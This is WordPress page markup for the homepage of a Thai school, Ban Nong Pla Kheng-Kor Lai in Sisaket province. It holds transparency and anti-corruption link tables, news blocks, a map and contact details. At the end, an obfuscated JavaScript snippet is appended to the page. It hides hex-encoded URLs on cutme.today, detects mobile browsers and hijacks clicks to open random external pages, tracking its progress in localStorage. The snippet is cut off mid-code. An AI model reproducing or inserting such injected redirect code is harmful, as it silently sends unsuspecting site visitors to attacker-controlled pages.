style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 